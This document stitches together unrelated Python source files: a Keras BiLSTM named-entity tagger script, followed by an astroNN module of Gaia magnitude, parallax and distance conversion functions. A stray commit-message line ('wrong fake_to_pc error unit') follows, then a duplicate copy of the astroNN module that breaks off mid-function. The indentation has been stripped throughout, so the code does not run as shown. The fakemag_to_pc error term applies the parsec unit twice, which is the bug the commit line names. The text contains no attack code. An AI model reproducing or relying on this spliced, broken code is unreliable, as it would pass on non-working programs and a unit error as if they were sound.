from optparse import OptionParser
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0]))))
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.base import BaseEstimator, TransformerMixin
os.environ['KERAS_BACKEND'] = 'tensorflow'
from keras.models import Sequential, load_model, Model
from keras.layers import Bidirectional, Dropout, Input
from keras.layers.wrappers import TimeDistributed
from keras.layers.recurrent import LSTM
from keras.layers.core import Dense, Masking
from keras.regularizers import L1L2
import numpy as np
import pickle
import gzip
from contentProcessing.attentiondecoder import AttentionDecoder
class Transformer(BaseEstimator, TransformerMixin):
def __init__(self):
BaseEstimator.__init__(self)
TransformerMixin.__init__(self)
def fit(self, l, y=None):
return self
def transform(self, l):
assert False, "Specialize this method!"
class SparseToDense(Transformer):
def __init__(self):
Transformer.__init__(self)
def transform(self, o):
return o.toarray()
class NodeTransformerTextEnclosed(Transformer):
"""
we will get a list of block and need to send back what a textual feature extractor (TfidfVectorizer) needs.
So we return a list of strings
"""
def transform(self, lw):
return map(lambda x: x, lw)
class DeepTagger():
usage = ""
version = "v.01"
description = "description: keras/bilstm ner"
def __init__(self):
self.dirName = None
self.sModelName = None
self.sAux = "aux.pkl"
self.nbClasses = None
self.max_sentence_len = 0
self.max_features = 100
self.maxngram = 3
self.nbEpochs = 10
self.batch_size = 50
self.hiddenSize= 32
self.bGridSearch = False
self.bTraining_multitype,self.bTraining, self.bTesting, self.bPredict = False,False,False, False
self.lTrain = []
self.lTest = []
self.lPredict= []
self.bAttentionLayer= False
self.bMultiType = False
# mapping vector
self.tag_vector={}
def setParams(self,dParams):
"""
"""
if dParams.dirname:
self.dirName = dParams.dirname
if dParams.name:
self.sModelName = dParams.name
if dParams.batchSize:
self.batch_size = dParams.batchSize
if dParams.nbEpochs:
self.nbEpochs = dParams.nbEpochs
if dParams.hidden:
self.hiddenSize = dParams.hidden
if dParams.nbfeatures:
self.max_features = dParams.nbfeatures
if dParams.ngram:
self.maxngram = dParams.ngram
self.bMultiType = dParams.multitype
if dParams.training:
self.lTrain = dParams.training
self.bTraining=True
if dParams.testing:
self.lTest = dParams.testing
self.bTesting=True
if dParams.predict:
self._sent =dParams.predict #.decode('latin-1')
self.bPredict=True
if dParams.attention:
self.bAttentionLayer=True
def initTransformeur(self):
self.cv= CountVectorizer( max_features = self.max_features
, analyzer = 'char' ,ngram_range = (1,self.maxngram)
, dtype=np.float64)
self.node_transformer = FeatureUnion([
("ngrams", Pipeline([
('selector', NodeTransformerTextEnclosed()),
('cv', self.cv),
('todense', SparseToDense())
])
)
])
def load_data_Multitype(self,lFName):
"""
load data as training data (x,y)
nbClasses must be known!
"""
self.nbClasses = 0
self.lClasses=[]
lTmp=[]
for fname in lFName:
f=open(fname,encoding='utf-8')
x=[]
for l in f:
l = l.strip()
if l[:3] == '# ':continue # comments
if l =='EOS':
lTmp.append(x)
self.max_sentence_len = max(self.max_sentence_len,len(x))
x=[]
else:
try:
la=l.split('\t')
b1=la[-1].split('_')[0]
b2=la[-1].split('_')[1]
except ValueError:
#print 'cannot find value and label in: %s'%(l)
continue
assert len(la) != 0
if b2 not in self.lClasses:
self.lClasses.append(b2)
if b1 not in self.lClasses:
self.lClasses.append(b1)
x.append((la[0],(b1,b2)))
if x != []:
lTmp.append(x)
f.close()
self.nbClasses = len(self.lClasses) + 1
for tag_class_id,b in enumerate(self.lClasses):
one_hot_vec = np.zeros(self.nbClasses, dtype=np.int32)
one_hot_vec[tag_class_id] = 1
self.tag_vector[b] = tuple(one_hot_vec)
self.tag_vector[tuple(one_hot_vec)] = b
# Add nil class
if 'NIL' not in self.tag_vector:
self.lClasses.append('NIL')
one_hot_vec = np.zeros(self.nbClasses, dtype=np.int32)
one_hot_vec[self.nbClasses-1] = 1
self.tag_vector['NIL'] = tuple(one_hot_vec)
self.tag_vector[tuple(one_hot_vec)] = 'NIL'
# print self.nbClasses
# shuffle(lTmp)
lX = []
lY = []
for sample in lTmp:
lX.append(list(map(lambda xy:xy[0],sample)))
lY.append(list(map(lambda xy:xy[1],sample)))
del lTmp
return lX,lY
def load_data(self,lFName):
"""
load data as training data (x,y)
nbClasses must be known!
"""
self.nbClasses = 0
self.lClasses=[]
lTmp=[]
for fname in lFName:
f=open(fname,encoding='utf-8')
x=[]
for l in f:
l = l.strip()
if l[:3] == '# ':continue # comments
if l =='EOS':
lTmp.append(x)
self.max_sentence_len = max(self.max_sentence_len,len(x))
x=[]
else:
try:
la=l.split('\t')
b1=la[-1]
except ValueError:
print ('cannot find value and label in: %s'%(l))
sys.exit()
assert len(la) != 0
if b1 not in self.lClasses:
self.lClasses.append(b1)
x.append((la[0],b1))
if x != []:
lTmp.append(x)
f.close()
self.nbClasses = len(self.lClasses) + 1
for tag_class_id,b in enumerate(self.lClasses):
one_hot_vec = np.zeros(self.nbClasses, dtype=np.int32)
one_hot_vec[tag_class_id] = 1
self.tag_vector[b] = tuple(one_hot_vec)
self.tag_vector[tuple(one_hot_vec)] = b
# Add nil class
if 'NIL' not in self.tag_vector:
self.lClasses.append('NIL')
one_hot_vec = np.zeros(self.nbClasses, dtype=np.int32)
one_hot_vec[self.nbClasses-1] = 1
self.tag_vector['NIL'] = tuple(one_hot_vec)
self.tag_vector[tuple(one_hot_vec)] = 'NIL'
# print self.nbClasses
# shuffle(lTmp)
lX = []
lY = []
for sample in lTmp:
lX.append(list(map(lambda xy:xy[0],sample)))
lY.append(list(map(lambda xy:xy[1],sample)))
del lTmp
return lX,lY
def load_data_for_testing(self,lFName):
"""
load data as training data (x,y)
nbClasses must be known!
loadModel first!
"""
lTmp=[]
for fname in lFName:
f=open(fname,encoding='utf-8')
x=[]
for l in f:
l = l.strip()
if l[:3] == '# ':continue # comments
if l =='EOS':
if x!=[]:
lTmp.append(x)
x=[]
else:
try:
la=l.split('\t')
b1=la[-1]
except ValueError:
print('cannot find value and label in: %s'%(l))
sys.exit(1)
x.append((la[0],b1))
if x != []:
lTmp.append(x)
f.close()
lX = []
lY = []
for sample in lTmp:
lX.append(list(map(lambda xy:xy[0],sample)))
lY.append(list(map(lambda xy:xy[1],sample)))
del lTmp
return lX,lY
def load_data_for_testing_Multitype(self,lFName):
"""
load data as training data (x,y)
nbClasses must be known!
loadModel first!
"""
lTmp=[]
for fname in lFName:
f=open(fname,encoding='utf-8')
x=[]
for l in f:
l = l.strip()
if l[:3] == '# ':continue # comments
if l =='EOS':
if x!=[]:
lTmp.append(x)
x=[]
else:
try:
la=l.split('\t')
b1=la[-1].split('_')[0]
b2=la[-1].split('_')[1]
except ValueError:
print('ml:cannot find value and label in: %s'%(l))
sys.exit()
assert len(la) != 0
x.append((la[0],(b1,b2)))
if x != []:
lTmp.append(x)
f.close()
lX = []
lY = []
for sample in lTmp:
lX.append(list(map(lambda xy:xy[0],sample)))
lY.append(list(map(lambda xy:xy[1],sample)))
del lTmp
return lX,lY
def storeModel(self,model, aux):
"""
store model and auxillary data (transformer)
"""
model.save('%s/%s.hd5'%(self.dirName,self.sModelName))
print('model dumped in %s/%s.hd5' % (self.dirName,self.sModelName))
#max_features,max_sentence_len, self.nbClasses,self.tag_vector , node_transformer
pickle.dump((self.bMultiType,self.maxngram,self.max_features,self.max_sentence_len,self.nbClasses,self.tag_vector,self.node_transformer),gzip.open('%s/%s.%s'%(self.dirName,self.sModelName,self.sAux),'wb'))
print('aux data dumped in %s/%s.%s' % (self.dirName,self.sModelName,self.sAux))
def loadModels(self):
"""
load models and aux data
"""
self.model = load_model(os.path.join(self.dirName,self.sModelName+'.hd5'),custom_objects={"AttentionDecoder": AttentionDecoder})
print('model loaded: %s/%s.hd5' % (self.dirName,self.sModelName))
try:
self.bMultiType,self.maxngram,self.max_features,self.max_sentence_len, self.nbClasses,self.tag_vector , self.node_transformer = pickle.load(gzip.open('%s/%s.%s'%(self.dirName,self.sModelName,self.sAux),'r'))
except:
self.maxngram,self.max_features,self.max_sentence_len, self.nbClasses,self.tag_vector , self.node_transformer = pickle.load(gzip.open('%s/%s.%s'%(self.dirName,self.sModelName,self.sAux),'r'))
self.bMultiType = False
print('aux data loaded: %s/%s.%s' % (self.dirName,self.sModelName,self.sAux))
print("ngram: %s\tmaxfea=%s\tpadding=%s\tnbclasses=%s" % (self.maxngram,self.max_features,self.max_sentence_len, self.nbClasses))
print("multitype model:%s"%(self.bMultiType))
def training(self,traindata):
"""
training
"""
train_X,_ = traindata #self.load_data(self.lTrain)
self.initTransformeur()
fX= [item for sublist in train_X for item in sublist ]
self.node_transformer.fit(fX)
#
lX,lY = self.prepareTensor(traindata)
# print lX.shape
# print lY.shape
model = Sequential()
reg= L1L2(l1=0.001, l2=0.0)
model.add(Masking(mask_value=0., input_shape=(self.max_sentence_len, self.max_features)))
model.add(Bidirectional(LSTM(self.hiddenSize,return_sequences = True,bias_regularizer=reg)))
model.add(Dropout(0.5))
if self.bAttentionLayer:
model.add(AttentionDecoder(self.max_sentence_len, self.nbClasses))
else:
model.add(TimeDistributed(Dense(self.nbClasses, activation='softmax')))
#keras.optimizers.RMSprop(lr=0.001, rho=0.9, epsilon=1e-08, decay=0.0)
model.compile(loss='categorical_crossentropy', optimizer='rmsprop',metrics=['categorical_accuracy'] )
print (model.summary())
_ = model.fit(lX, lY, epochs = self.nbEpochs,batch_size = self.batch_size, verbose = 1,validation_split = 0.33, shuffle=True)
del lX,lY
auxdata = self.max_features,self.max_sentence_len,self.nbClasses,self.tag_vector,self.node_transformer
return model, auxdata
def training_multitype(self,traindata):
"""
training
"""
train_X,_ = traindata #self.load_data(self.lTrain)
self.initTransformeur()
fX= [item for sublist in train_X for item in sublist ]
self.node_transformer.fit(fX)
#
lX,(lY,lY2) = self.prepareTensor_multitype(traindata)
# print lX.shape
# print lY.shape
inputs = Input(shape=(self.max_sentence_len, self.max_features))
x = Masking(mask_value=0)(inputs)
x = Bidirectional(LSTM(self.hiddenSize,return_sequences = True))(x)
x = Dropout(0.5)(x)
out1 = TimeDistributed(Dense(self.nbClasses, activation='softmax'),name='BIES')(x)
out2 = TimeDistributed(Dense(self.nbClasses, activation='softmax'),name='Label')(x)
model = Model(input = inputs,output = [out1,out2])
model.compile(loss='categorical_crossentropy', optimizer='rmsprop',metrics=['categorical_accuracy'] )
print (model.summary())
_ = model.fit(lX, [lY,lY2], epochs = self.nbEpochs,batch_size = self.batch_size, verbose = 1,validation_split = 0.33, shuffle=True)
del lX,lY
auxdata = self.max_features,self.max_sentence_len,self.nbClasses,self.tag_vector,self.node_transformer
return model, auxdata
def prepareTensor_multitype(self,annotated):
lx,ly = annotated
lX = list()
lY1= list()
lY2= list()
# = np.array()
for x,y in zip(lx,ly):
words = self.node_transformer.transform(x)
wordsvec = []
elem_tags1 = []
elem_tags2 = []
for ix,ss in enumerate(words):
wordsvec.append(ss)
elem_tags1.append(list(self.tag_vector[y[ix][0]]))
elem_tags2.append(list(self.tag_vector[y[ix][1]]))
nil_X = np.zeros(self.max_features)
nil_Y = np.array(self.tag_vector['NIL'])
pad_length = self.max_sentence_len - len(wordsvec)
lX.append( wordsvec +((pad_length)*[nil_X]) )
lY1.append( elem_tags1 + ((pad_length)*[nil_Y]) )
lY2.append( elem_tags2 + ((pad_length)*[nil_Y]) )
del lx
del ly
lX=np.array(lX)
lY1=np.array(lY1)
lY2=np.array(lY2)
return lX,(lY1,lY2)
def prepareTensor(self,annotated):
lx,ly = annotated
lX = list()
lY= list()
# = np.array()
for x,y in zip(lx,ly):
words = self.node_transformer.transform(x)
wordsvec = []
elem_tags = []
for ix,ss in enumerate(words):
wordsvec.append(ss)
elem_tags.append(list(self.tag_vector[y[ix]]))
nil_X = np.zeros(self.max_features)
nil_Y = np.array(self.tag_vector['NIL'])
pad_length = self.max_sentence_len - len(wordsvec)
lX.append( wordsvec +((pad_length)*[nil_X]) )
lY.append( elem_tags + ((pad_length)*[nil_Y]) )
del lx
del ly
lX=np.array(lX)
lY=np.array(lY)
return lX,lY
def testModel(self,testdata):
"""
test model
"""
lX,lY= self.prepareTensor(testdata)
# print lX.shape
# print lY.shape
scores = self.model.evaluate(lX,lY,verbose=True)
print(list(zip(self.model.metrics_names,scores)))
test_x, _ = testdata
y_pred = self.model.predict(lX)
for i,_ in enumerate(lX):
pred_seq = y_pred[i]
pred_tags = []
#pad_length = self.max_sentence_len - len(test_x[i])
for class_prs in pred_seq:
class_vec = np.zeros(self.nbClasses, dtype=np.int32)
class_vec[ np.argmax(class_prs) ] = 1
if tuple(class_vec.tolist()) in self.tag_vector:
pred_tags.append((self.tag_vector[tuple(class_vec.tolist())],class_prs[np.argmax(class_prs)]))
print(test_x[i],pred_tags[:len(test_x[i])])
def testModel_Multitype(self,testdata):
"""
test model
"""
lX,(lY,lY2) = self.prepareTensor_multitype(testdata)
scores = self.model.evaluate(lX,[lY,lY2],verbose=True)
print(list(zip(self.model.metrics_names,scores)))
test_x, _ = testdata
y_pred1,y_pred2 = self.model.predict(lX)
for i,_ in enumerate(lX):
for pred_seq in [y_pred1[i],y_pred2[i]]:
pred_tags = []
for class_prs in pred_seq:
class_vec = np.zeros(self.nbClasses, dtype=np.int32)
class_vec[ np.argmax(class_prs) ] = 1
# print class_prs[class_prs >0.1]
if tuple(class_vec.tolist()) in self.tag_vector:
# print(self.tag_vector[tuple(class_vec.tolist())],class_prs[np.argmax(class_prs)])
pred_tags.append((self.tag_vector[tuple(class_vec.tolist())],class_prs[np.argmax(class_prs)]))
print(test_x[i],pred_tags[:len(test_x[i])])
def prepareOutput_multitype(self,lToken,lLTags):
"""
format final output with MultiType
first level: BIES segmentation
remaining levels: label
assumption: no contradiction between layers
"""
chunk=[]
lChunk=[]
curTag=None
for itok,tok in enumerate(lToken):
# print(tok,lLTags[0][itok],lLTags[1][itok])
BIES,_ = lLTags[0][itok]
offset = itok
tag,score2 = lLTags[1][itok]
if tag != curTag:
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score2)]
elif BIES == 'B':
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score2)]
elif BIES in ['I','E']:
chunk.append((offset,tok,score2))
elif BIES == 'S':
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score2)]
if chunk !=[]:
lChunk.append((chunk,tag))
lRes=[]
for (lList,label) in lChunk:
# tok = " ".join(map(lambda x,tok,y: tok,lList))
tok = " ".join(x[1] for x in lList)
toffset = min(x[0] for x in lList),max(x[0] for x in lList)
lScore = (x[2] for x in lList)
# print toffset,tok,label,lScore
lRes.append((toffset,tok,label,list(lScore)))
return lRes
def prepareOutput(self,lToken, lTags):
"""
format final output
"""
chunk=[]
lChunk=[]
curTag=None
for offset,(tok, (tag,score)) in enumerate(list(zip(lToken,lTags))):
# print(tok.encode('utf-8'), tag)
BIES,tag = tag.split('_')
if tag != curTag:
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score)]
elif BIES == 'B':
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score)]
elif BIES in ['I','E']:
chunk.append((offset,tok,score))
elif BIES == 'S':
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score)]
if chunk !=[]:
lChunk.append((chunk,tag))
lRes=[]
for (lList,label) in lChunk:
tok = " ".join(x[1] for x in lList)
toffset = min(x[0] for x in lList),max(x[0] for x in lList)
lScore = (x[2] for x in lList)
# tok = " ".join(map(lambda x,tok,y: tok,lList))
# toffset = (min(map(lambda offset,x,y: offset,lList)),max(map(lambda offset,x,y: offset,lList)))
# lScore = (map(lambda offset,_,score: score,lList))
lRes.append((toffset,tok,label,list(lScore)))
return lRes
def predict_multiptype(self,lsent):
"""
predict over a set of sentences (unicode)
"""
lRes= []
for mysent in lsent :
# print self.tag_vector
if len(mysent.split())> self.max_sentence_len:
print ('max sent length: %s'%self.max_sentence_len)
continue
allwords= self.node_transformer.transform(mysent.split())
# print mysent.split()
# n=len(mysent.split())
wordsvec = []
for w in allwords:
wordsvec.append(w)
lX = list()
nil_X = np.zeros(self.max_features)
pad_length = self.max_sentence_len - len(wordsvec)
lX.append( wordsvec +((pad_length)*[nil_X]) )
lX=np.array(lX)
# print(pad_length*[nil_X] + wordsvec, self.max_sentence_len)
# assert pad_length*[nil_X] + wordsvec >= self.max_sentence_len
y_pred1,y_pred2 = self.model.predict(lX)
for i,_ in enumerate(lX):
# pred_seq = y_pred[i]
l_multi_type_results = []
for pred_seq in [y_pred1[i],y_pred2[i]]:
pred_tags = []
pad_length = self.max_sentence_len - len(allwords)
for class_prs in pred_seq:
class_vec = np.zeros(self.nbClasses, dtype=np.int32)
class_vec[ np.argmax(class_prs) ] = 1
# print class_prs[class_prs >0.1]
if tuple(class_vec.tolist()) in self.tag_vector:
#print self.tag_vector[tuple(class_vec.tolist())],class_prs[np.argmax(class_prs)]
pred_tags.append((self.tag_vector[tuple(class_vec.tolist())],class_prs[np.argmax(class_prs)]))
l_multi_type_results.append(pred_tags[:len(allwords)])
print(l_multi_type_results)
lRes.append(self.prepareOutput_multitype(mysent.split(),l_multi_type_results))
return lRes
def predict(self,lsent):
"""
predict over a set of sentences (unicode)
"""
lRes= []
for mysent in lsent :
# print self.tag_vector
if len(mysent.split())> self.max_sentence_len:
print ('max sent length: %s'%self.max_sentence_len)
continue
allwords= self.node_transformer.transform(mysent.split())
# print mysent.split()
# n=len(mysent.split())
wordsvec = []
for w in allwords:
wordsvec.append(w)
lX = list()
nil_X = np.zeros(self.max_features)
pad_length = self.max_sentence_len - len(wordsvec)
lX.append( wordsvec +((pad_length)*[nil_X]) )
lX=np.array(lX)
# assert pad_length*[nil_X] + wordsvec >= self.max_sentence_len
y_pred = self.model.predict(lX)
for i,_ in enumerate(lX):
pred_seq = y_pred[i]
pred_tags = []
pad_length = self.max_sentence_len - len(allwords)
for class_prs in pred_seq:
class_vec = np.zeros(self.nbClasses, dtype=np.int32)
class_vec[ np.argmax(class_prs) ] = 1
# print class_prs[class_prs >0.1]
if tuple(class_vec.tolist()) in self.tag_vector:
pred_tags.append((self.tag_vector[tuple(class_vec.tolist())],class_prs[np.argmax(class_prs)]))
# print zip(mysent.encode('utf-8').split(),pred_tags[pad_length:])
# lRes.append((mysent.split(),pred_tags[pad_length:]))
lRes.append(self.prepareOutput(mysent.split(),pred_tags[:len(allwords)]))
return lRes
def gridSearch(self):
"""
perform grid search training
assume epochs,ngram, nbfeatures as N,N
assume testing data for cross valid
"""
def run(self):
"""
"""
if self.bGridSearch:
self.gridSearch()
if self.bMultiType and self.bTraining:
lX, lY = self.load_data_Multitype(self.lTrain)
print(lY)
model, other = self.training_multitype((lX,lY))
# store
self.storeModel(model,other)
del lX, lY
del self.node_transformer
del model
if self.bTraining and not self.bMultiType:
lX, lY = self.load_data(self.lTrain)
model, other = self.training((lX,lY))
# store
self.storeModel(model,other)
del lX, lY
del self.node_transformer
del model
if self.bTesting:
self.loadModels()
if self.bMultiType:
lX,lY = self.load_data_for_testing_Multitype(self.lTest)
res = self.testModel_Multitype((lX,lY))
else:
lX,lY = self.load_data_for_testing(self.lTest)
res = self.testModel((lX,lY))
if self.bPredict:
# which input format: [unicode]
self.loadModels()
lsent = [self._sent]
print (lsent)
if self.bMultiType:
lres = self.predict_multiptype(lsent)
else:
lres = self.predict(lsent)
for r in lres:
print (r)
if __name__ == '__main__':
cmp = DeepTagger()
cmp.parser = OptionParser(usage="", version="0.1")
cmp.parser.description = "BiLSTM approach for NER"
cmp.parser.add_option("--name", dest="name", action="store", type="string", help="model name")
cmp.parser.add_option("--dir", dest="dirname", action="store", type="string", help="directory to store model")
cmp.parser.add_option("--training", dest="training", action="append", type="string", help="training data")
cmp.parser.add_option("--ml", dest="multitype", action="store_true",default=False, help="multi type version")
cmp.parser.add_option("--hidden", dest="hidden", action="store", type="int", help="hidden layer dimension")
cmp.parser.add_option("--batch", dest="batchSize", action="store", type="int", help="batch size")
cmp.parser.add_option("--epochs", dest="nbEpochs", action="store", type="int", help="nb epochs for training")
cmp.parser.add_option("--ngram", dest="ngram", action="store", type="int", help="ngram size")
cmp.parser.add_option("--nbfeatures", dest="nbfeatures", action="store", type="int", help="nb features")
cmp.parser.add_option("--testing", dest="testing", action="append", type="string", help="test data")
cmp.parser.add_option("--run", dest="predict", action="store", type="string", help="string to be categorized")
cmp.parser.add_option("--att", dest="attention", action="store_true", default=False, help="add attention layer")
(options, args) = cmp.parser.parse_args()
#Now we are back to the normal programmatic mode, we set the component parameters
cmp.setParams(options)
#This component is quite special since it does not take one XML as input but rather a series of files.
#doc = cmp.loadDom()
doc = cmp.run()
|
# ---------------------------------------------------------#
# astroNN.gaia.gaia_shared: shared functions for apogee
# ---------------------------------------------------------#
import os
import numpy as np
from astropy import units as u
def gaia_env():
"""
NAME:
gaia_env
PURPOSE:
get Gaia enviroment variable
INPUT:
OUTPUT:
(path)
HISTORY:
2017-Oct-26 - Written - Henry Leung (University of Toronto)
"""
from astroNN import ENVVAR_WARN_FLAG
_GAIA = os.getenv('GAIA_TOOLS_DATA')
if _GAIA is None and ENVVAR_WARN_FLAG is True:
print("WARNING! Gaia enviroment variable GAIA_TOOLS_DATA not set")
return _GAIA
def gaia_default_dr(dr=None):
"""
NAME:
gaia_default_dr
PURPOSE:
Check if dr arguement is provided, if none then use default
INPUT:
dr (int): GAIA DR, example dr=1
OUTPUT:
dr (int): GAIA DR, example dr=1
HISTORY:
2017-Oct-26 - Written - Henry Leung (University of Toronto)
"""
if dr is None:
dr = 1
print('dr is not provided, using default dr={}'.format(dr))
else:
pass
return dr
def mag_to_fakemag(mag, parallax, parallax_err=None):
"""
NAME:
mag_to_fakemag
PURPOSE:
To convert appearant magnitude to astroNN's fake magnitude
INPUT:
mag (float, ndarray): appearant magnitude
parallax (float, ndarray): parallax in mas
parallax_err (float, ndarray): parallax err in mas
OUTPUT:
fakemag (float, ndarray)
(conditional) fakemag_err (float, ndarray)
HISTORY:
2017-Oct-14 - Written - Henry Leung (University of Toronto)
"""
# Check unit if available
if type(parallax) == u.quantity.Quantity:
if parallax.unit != u.mas:
parallax.to(u.mas)
print(
'Please be advised that astroNN fakemag function expects mas, astroNN has corrected the unit according'
' to astropy unit framework')
# Take the value as we cant apply log10 to astropy unit
parallax = parallax.value
else:
print('Please be advised that astroNN fakemag is parallax(mas) * 10 ** (0.2 * mag)')
if parallax_err is None:
return parallax * (10 ** (0.2 * mag))
else:
fakemag = parallax * (10 ** (0.2 * mag))
fakemag_err = np.abs((parallax_err / parallax) * fakemag)
return fakemag, fakemag_err
def mag_to_absmag(mag, parallax, parallax_err=None):
"""
NAME:
mag_to_absmag
PURPOSE:
To convert appearant magnitude to absolute magnitude
INPUT:
mag (float, ndarray): magnitude
parallax (float, ndarray): parallax
parallax_err (float, ndarray): parallax err in mas
OUTPUT:
absmag (float, ndarray)
(conditional) absmag_err (float, ndarray)
HISTORY:
2017-Oct-14 - Written - Henry Leung (University of Toronto)
"""
# Check unit if available
if type(parallax) == u.quantity.Quantity:
if parallax.unit != u.arcsec:
parallax.to(u.arcsec)
print('Please be advised that astroNN mag_to_absmag() expects arcsecond, astroNN has corrected the unit '
'according to astropy unit framework')
# Take the value as we cant apply log10 to astropy unit
parallax = parallax.value
else:
print('Please be advised that astroNN mag_to_absmag expects parallax in (arcsecond)')
if parallax_err is None:
return mag + 5 * (np.log10(parallax) + 1)
else:
absmag = mag + 5 * (np.log10(parallax) + 1)
absmag_err = 5 * np.abs(parallax_err / (parallax * np.log(10)))
return absmag, absmag_err
def absmag_to_pc(absmag, mag):
"""
NAME:
absmag_to_pc
PURPOSE:
To convert absolute magnitude to parsec
INPUT:
mag (float, ndarray): magnitude
absmag (float, ndarray): absolute magnitude
OUTPUT:
parsec (float, ndarray with astropy unit) in pc
HISTORY:
2017-Nov-16 - Written - Henry Leung (University of Toronto)
"""
return (1 / (10 ** (((absmag - mag) / 5) - 1))) * u.parsec
def fakemag_to_absmag(fakemag):
"""
NAME:
fakemag_to_absmag
PURPOSE:
To convert fakemag to absmag
INPUT:
fakemag (float, ndarray): fakemag
OUTPUT:
absmag (float, ndarray
HISTORY:
2018-Jan-31 - Written - Henry Leung (University of Toronto)
"""
return 5 * (np.log10(fakemag) - 2)
def absmag_to_fakemag(absmag):
"""
NAME:
absmag_to_fakemag
PURPOSE:
To convert absmag to fakemag
INPUT:
fakemag (float, ndarray): fakemag
OUTPUT:
absmag (float, ndarray
HISTORY:
2018-Jan-31 - Written - Henry Leung (University of Toronto)
"""
return 10 ** (0.2 * absmag + 2)
def fakemag_to_pc(fakemag, mag, fakemag_err=None):
"""
NAME:
fakemag_to_absmag
PURPOSE:
To convert fakemag to parsec
INPUT:
fakemag (float, ndarray): fakemag
mag (float, ndarray): magnitude
fakemag_err (float, ndarray): fakemag err
OUTPUT:
parsec (float, ndarray with astropy unit) in pc
HISTORY:
2018-Jan-31 - Written - Henry Leung (University of Toronto)
"""
if fakemag_err is None:
return 1000 * (10 ** (0.2 * mag)) / fakemag * u.parsec
else:
pc = 1000 * (10 ** (0.2 * mag)) / fakemag * u.parsec
pc_err = (fakemag_err / fakemag) * pc * u.parsec
return pc, pc_err
wrong fake_to_pc error unit
# ---------------------------------------------------------#
# astroNN.gaia.gaia_shared: shared functions for apogee
# ---------------------------------------------------------#
import os
import numpy as np
from astropy import units as u
def gaia_env():
"""
NAME:
gaia_env
PURPOSE:
get Gaia enviroment variable
INPUT:
OUTPUT:
(path)
HISTORY:
2017-Oct-26 - Written - Henry Leung (University of Toronto)
"""
from astroNN import ENVVAR_WARN_FLAG
_GAIA = os.getenv('GAIA_TOOLS_DATA')
if _GAIA is None and ENVVAR_WARN_FLAG is True:
print("WARNING! Gaia enviroment variable GAIA_TOOLS_DATA not set")
return _GAIA
def gaia_default_dr(dr=None):
"""
NAME:
gaia_default_dr
PURPOSE:
Check if dr arguement is provided, if none then use default
INPUT:
dr (int): GAIA DR, example dr=1
OUTPUT:
dr (int): GAIA DR, example dr=1
HISTORY:
2017-Oct-26 - Written - Henry Leung (University of Toronto)
"""
if dr is None:
dr = 1
print('dr is not provided, using default dr={}'.format(dr))
else:
pass
return dr
def mag_to_fakemag(mag, parallax, parallax_err=None):
"""
NAME:
mag_to_fakemag
PURPOSE:
To convert appearant magnitude to astroNN's fake magnitude
INPUT:
mag (float, ndarray): appearant magnitude
parallax (float, ndarray): parallax in mas
parallax_err (float, ndarray): parallax err in mas
OUTPUT:
fakemag (float, ndarray)
(conditional) fakemag_err (float, ndarray)
HISTORY:
2017-Oct-14 - Written - Henry Leung (University of Toronto)
"""
# Check unit if available
if type(parallax) == u.quantity.Quantity:
if parallax.unit != u.mas:
parallax.to(u.mas)
print(
'Please be advised that astroNN fakemag function expects mas, astroNN has corrected the unit according'
' to astropy unit framework')
# Take the value as we cant apply log10 to astropy unit
parallax = parallax.value
else:
print('Please be advised that astroNN fakemag is parallax(mas) * 10 ** (0.2 * mag)')
if parallax_err is None:
return parallax * (10 ** (0.2 * mag))
else:
fakemag = parallax * (10 ** (0.2 * mag))
fakemag_err = np.abs((parallax_err / parallax) * fakemag)
return fakemag, fakemag_err
def mag_to_absmag(mag, parallax, parallax_err=None):
"""
NAME:
mag_to_absmag
PURPOSE:
To convert appearant magnitude to absolute magnitude
INPUT:
mag (float, ndarray): magnitude
parallax (float, ndarray): parallax
parallax_err (float, ndarray): parallax err in mas
OUTPUT:
absmag (float, ndarray)
(conditional) absmag_err (float, ndarray)
HISTORY:
2017-Oct-14 - Written - Henry Leung (University of Toronto)
"""
# Check unit if available
if type(parallax) == u.quantity.Quantity:
if parallax.unit != u.arcsec:
parallax.to(u.arcsec)
print('Please be advised that astroNN mag_to_absmag() expects arcsecond, astroNN has corrected the unit '
'according to astropy unit framework')
# Take the value as we cant apply log10 to astropy unit
parallax = parallax.value
else:
print('Please be advised that astroNN mag_to_absmag expects parallax in (arcsecond)')
if parallax_err is None:
return mag + 5 * (np.log10(parallax) + 1)
else:
absmag = mag + 5 * (np.log10(parallax) + 1)
absmag_err = 5 * np.abs(parallax_err / (parallax * np.log(10)))
return absmag, absmag_err
def absmag_to_pc(absmag, mag):
"""
NAME:
absmag_to_pc
PURPOSE:
To convert absolute magnitude to parsec
INPUT:
mag (float, ndarray): magnitude
absmag (float, ndarray): absolute magnitude
OUTPUT:
parsec (float, ndarray with astropy unit) in pc
HISTORY:
2017-Nov-16 - Written - Henry Leung (University of Toronto)
"""
return (1 / (10 ** (((absmag - mag) / 5) - 1))) * u.parsec
def fakemag_to_absmag(fakemag):
"""
NAME:
fakemag_to_absmag
PURPOSE:
To convert fakemag to absmag
INPUT:
fakemag (float, ndarray): fakemag
OUTPUT:
absmag (float, ndarray
HISTORY:
2018-Jan-31 - Written - Henry Leung (University of Toronto)
"""
return 5 * (np.log10(fakemag) - 2)
def absmag_to_fakemag(absmag):
"""
NAME:
absmag_to_fakemag
PURPOSE:
To convert absmag to fakemag
INPUT:
fakemag (float, ndarray): fakemag
OUTPUT:
absmag (float, ndarray
HISTORY:
2018-Jan-31 - Written - Henry Leung (University of Toronto)
"""
return 10 ** (0.2 * absmag + 2)
def fakemag_to_pc(fakemag, mag, fakemag_err=None):
"""
NAME:
fakemag_to_absmag
PURPOSE:
To convert fakemag to parsec
INPUT:
fakemag (float, ndarray): fakemag
mag (float, ndarray): magnitude
fakemag_err (float, ndarray): fakemag err
OUTPUT:
parsec (float, ndarray with astropy unit) in pc
HISTORY:
2018-Jan-31 - Written - Henry Leung (University of Toronto)
"""
if fakemag_err is None:
return 1000 * (10 ** (0.2 * mag)) / fakemag * u.parsec
else:
